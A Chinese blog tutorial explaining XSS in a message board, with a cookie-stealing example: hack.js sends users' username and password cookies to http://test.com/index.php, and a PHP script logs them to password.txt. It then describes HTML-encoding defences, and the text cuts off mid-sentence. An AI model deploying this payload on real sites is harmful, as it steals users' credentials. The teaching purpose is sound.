• 跨站脚本攻击之XSS漏洞


    addElement()方法用于添加新的留言,而renderComments()方法用于展留言列表,网页看起来是这样的

    image

    XSS

    因为我们完全信任了用户输入,但有些别有用心的用户会像这样的输入

    image

    这样无论是谁访问这个页面的时候控制台都会输出“Hey you are a fool fish!”,如果这只是个恶意的小玩笑,有些人做的事情就不可爱了,有些用户会利用这个漏洞窃取用户信息、诱骗人打开恶意网站或者下载恶意程序等,看个最简单的例子

    利用xss窃取用户名密码

    当然这个示例很简单,几乎攻击不到任何网站,仅仅看看其原理。我们知道很多登陆界面都有记住用户名、密码的功能方便用户下次登录,有些网站是直接用明文记录用户名、密码,恶意用户注册账户登录后使用简单工具查看cookie结构名称后,如果网站有xss漏洞,那么简单的利用jsonp就可以获取其它用户的用户名、密码了。

    恶意用户会这么输入

    image

    我们看看http://test.com/hack.js里藏了什么

    var username=CookieHelper.getCookie('username').value;
    var password=CookieHelper.getCookie('password').value;
    var script =document.createElement('script');
    script.src='http://test.com/index.php?username='+username+'&password='+password;
    document.body.appendChild(script);

    几句简单的javascript,获取cookie中的用户名密码,利用jsonp把向http://test.com/index.php

    发送了一个get请求

    http://test.com/index.php

    复制代码
    <?php
        if(!empty($_GET['password'])){
            $username=$_GET['username'];
            $password=$_GET['password'];
            
            try{
                $path=$_SERVER["DOCUMENT_ROOT"].'/password.txt';
                $fp=fopen($path,'a');
                flock($fp, LOCK_EX);
                fwrite($fp, "$username	 $password
    ");
                flock($fp, LOCK_UN);
                fclose($fp);
            }catch(Exception $e){
    
            }
        }
    ?>
    复制代码

    这样恶意用户就把访问留言板的用户的信息窃取了

    怎么预防

    上面演示的是一个非常简单的XSS攻击,还有很多隐蔽的方式,但是其核心都是利用了脚本注入,因此我们解决办法其实很简单,不信赖用户输入,对特殊字符如”<”,”>”转义,就可以从根本上防止这一问题,当然很多解决方案都对XSS做了特定限制,如上面这中做法在ASP.NET中不幸不同,微软validateRequest对表单提交自动做了XSS验证。但防不胜防,总有些聪明的恶意用户会到我们的网站搞破坏,对自己站点不放心可以看看这个XSS跨站测试代码大全试试站点是否安全。

    系统内部需要弹出消息的时候只要将用户Redirect到 ShowMessage.ashx?Msg=消息就

    可以,比如

      Response.Redirect("ShowMessage.ashx?Msg=用户名不能为空!");

    我们可以对请求的数据做检测,如果请求数据中有<等就认为是恶意请求,禁止

    提交。aspx默认就是采用这种策略,这样做的缺点是如果做的是一个程序员论坛

    ,程序员就无法发表HTML代码的帖子了,因此更好的处理策略是将用户发表的

    内容按照原样显示出来,而不是以HTML的方式显示出来。使用

    HttpUtility.HtmlEncode就可以将字符串中的<、>等特殊字符转换为HTML显示的

    字符,也就是不把<script>当成定义脚本的标签,而是当成“&lt;script&gt;”这样可

    以在页面上直接显示出来的内容。

    修改看帖代码,将context.Response.Write(line + "<hr/>");修改为

  • 相关阅读:
    JAVA 之 JSTL
    IDEA 之 ERROR:无法在web.xml或使用此应用程序部署的jar文件中解析绝对uri:[http://java.sun.com/jsp/jstl/core]
    JAVA 之 EL表达式
    IDEA 之 ERROR:端口被占用
    【ubuntu】windows+ubuntu 设置windows为第一启动项
    【ubuntu】Error: environment block too small. Press any key to continue
    Navicat premium15安装破解教程
    通过django中间件和python魔法方法实现自定义session(通过文件存储session)
    每日作业 7/2
    每日作业 7/1
  • 原文地址:https://www.cnblogs.com/xinziyublog/p/4741658.html
Copyright © 2020-2023  润新知